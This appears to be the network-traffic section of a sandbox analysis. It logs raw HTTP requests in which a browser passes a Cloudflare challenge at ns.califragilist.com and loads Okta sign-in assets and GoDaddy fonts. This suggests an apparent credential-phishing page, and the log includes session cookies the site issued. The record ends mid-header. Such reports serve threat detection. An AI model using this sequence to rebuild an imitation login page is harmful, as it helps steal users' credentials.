            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8de644ce9b5745f6/1730908538244/-_ter8awBYLmx72 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8de644ce9b5745f6/1730908538244/-_ter8awBYLmx72 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cboOIeS9NKidIhE5DtVGZJdhr1AU8tkEd4AG7ei0Kkgcq HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJaYUtuem1IWVZsTCtNTzU4QzJKWXc9PSIsInZhbHVlIjoiU01IU1N3ZFBvdkhuYlVnaHVDL2MzeG16VEk5RUtJS0ZFWWhIOW5GcnFOS2J1dHpvTHJ4S1R4YUo1OFN5aHZhTXl6VytzWjVCWlJORGg0RDNsNlMxdm9TQ1VGcXFVMUxhRUFwUkc3VmN2VWtMMGQxbTBsZjNWbm5kT2dkMkI0alIiLCJtYWMiOiJjYWY5NzNjYmQwYmQ0ZTRhMTRjYTljYTZlNjFjZGQ2MGUwZTVmYzFkYTBhZmFmMzc4YzU4NzBhZTg4NTgwMGQ4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikljd0h3aUgwNUk1K0pkNUZKWnZKQkE9PSIsInZhbHVlIjoiaEw5Q1NMUEQ0cEIvZDJVbUd6RFliSTBHanJ2aTV1WTIza2pVckRxMnlwS0c5Z01SR2dMaTZJdVREYXJhZ2Npb2lQZ3dGMURleXZMMzZaVSszdjBXZk5IVERKRXArZWVUYTEwNnBJTWh0cytTQ1VvRmI3K2hOKytKN1dvYXdyS24iLCJtYWMiOiI4NTUyODc1MGVmMzBjOTM5NGQ1NTNjNGQwMDNiOGZiYjY0ZjZkNjU0NDZjNDEyZDViOTQxZWRhMmYyNDA4ZGQzIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /7PXU/ HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJaYUtuem1IWVZsTCtNTzU4QzJKWXc9PSIsInZhbHVlIjoiU01IU1N3ZFBvdkhuYlVnaHVDL2MzeG16VEk5RUtJS0ZFWWhIOW5GcnFOS2J1dHpvTHJ4S1R4YUo1OFN5aHZhTXl6VytzWjVCWlJORGg0RDNsNlMxdm9TQ1VGcXFVMUxhRUFwUkc3VmN2VWtMMGQxbTBsZjNWbm5kT2dkMkI0alIiLCJtYWMiOiJjYWY5NzNjYmQwYmQ0ZTRhMTRjYTljYTZlNjFjZGQ2MGUwZTVmYzFkYTBhZmFmMzc4YzU4NzBhZTg4NTgwMGQ4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikljd0h3aUgwNUk1K0pkNUZKWnZKQkE9PSIsInZhbHVlIjoiaEw5Q1NMUEQ0cEIvZDJVbUd6RFliSTBHanJ2aTV1WTIza2pVckRxMnlwS0c5Z01SR2dMaTZJdVREYXJhZ2Npb2lQZ3dGMURleXZMMzZaVSszdjBXZk5IVERKRXArZWVUYTEwNnBJTWh0cytTQ1VvRmI3K2hOKytKN1dvYXdyS24iLCJtYWMiOiI4NTUyODc1MGVmMzBjOTM5NGQ1NTNjNGQwMDNiOGZiYjY0ZjZkNjU0NDZjNDEyZDViOTQxZWRhMmYyNDA4ZGQzIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /xyi0aNMuJJrB8y7WGAXkiQfmja4dMwqOBavMS5zthEqgNsefw HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijd2QkhDZmlrS2dKUXpZTjFMV2pldmc9PSIsInZhbHVlIjoiaHJhNUIyTEtvVThkaldLM3oyTTU4M1hKUFZJV1k5bGUzdVAzZmxLUFhkSG8rOVQyZ3JLYkVTdmdxbkZ1RU04UHBvK2lXQWNxblgzMG0xT2xxL2tadEV6RzhGMWlYakxneVdOSk0vZlRncDVLY0c3dG9uZ2x2c1F5VXlwb3ZsajMiLCJtYWMiOiJlYWM3ZTMxOTBiZjMzYmM4ZTdmN2RiZjM3ZmI0YTY5ZmIyZjNhZWZiYTE4NzVlMWM3NDU0MzQwZDdhOWQ1M2NhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxHU1hITFQ3SkZ6bVJBdHRPVWV4VlE9PSIsInZhbHVlIjoiT0JmdFJXd01EeG9qSjcrMTlCRWtVeUM0cjliUzZRMUxzM2hHaVVaMFFEdG5hcGM5R0VmRVd5amJKSTR4MWVTbFQ2RHNDUW5oNHFBaHU1OVRmMmZmTEQ5TmNhUCtmTk1na0hoMjc5OVdyTEwxNW1rZkcrQXlRNnhTTXVIazJRcHMiLCJtYWMiOiI3YWVmYzc4OGEwODFmMDZkNDc4NGRiZjlkMGJjNGQ3MjlhYWQzZjM4MGQ4YzllY2ZjMjA5MzMwODczNDRjNDMyIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /exdlnqbmbchbkrnxhuntke151625768903329522495766gd0sztam2f63i24v08nret?71107507272637789503550UT0MURYOK2EBMVG64K4712 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijd2QkhDZmlrS2dKUXpZTjFMV2pldmc9PSIsInZhbHVlIjoiaHJhNUIyTEtvVThkaldLM3oyTTU4M1hKUFZJV1k5bGUzdVAzZmxLUFhkSG8rOVQyZ3JLYkVTdmdxbkZ1RU04UHBvK2lXQWNxblgzMG0xT2xxL2tadEV6RzhGMWlYakxneVdOSk0vZlRncDVLY0c3dG9uZ2x2c1F5VXlwb3ZsajMiLCJtYWMiOiJlYWM3ZTMxOTBiZjMzYmM4ZTdmN2RiZjM3ZmI0YTY5ZmIyZjNhZWZiYTE4NzVlMWM3NDU0MzQwZDdhOWQ1M2NhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxHU1hITFQ3SkZ6bVJBdHRPVWV4VlE9PSIsInZhbHVlIjoiT0JmdFJXd01EeG9qSjcrMTlCRWtVeUM0cjliUzZRMUxzM2hHaVVaMFFEdG5hcGM5R0VmRVd5amJKSTR4MWVTbFQ2RHNDUW5oNHFBaHU1OVRmMmZmTEQ5TmNhUCtmTk1na0hoMjc5OVdyTEwxNW1rZkcrQXlRNnhTTXVIazJRcHMiLCJtYWMiOiI3YWVmYzc4OGEwODFmMDZkNDc4NGRiZjlkMGJjNGQ3MjlhYWQzZjM4MGQ4YzllY2ZjMjA5MzMwODczNDRjNDMyIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /exdlnqbmbchbkrnxhuntke151625768903329522495766gd0sztam2f63i24v08nret?71107507272637789503550UT0MURYOK2EBMVG64K4712 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /34m8PEW3Ch1AL9UabKKEr8920 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /xyAq43pQ3AarsEuef30 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ns.califragilist.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ns.califragilist.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ns.califragilist.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ns.califragilist.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241106%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241106T155559Z&X-Amz-Expires=300&X-Amz-Signature=c35f79085d4530d97feeeba7c17e7b0be2f621881773f7b10a56f304666d5b45&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: 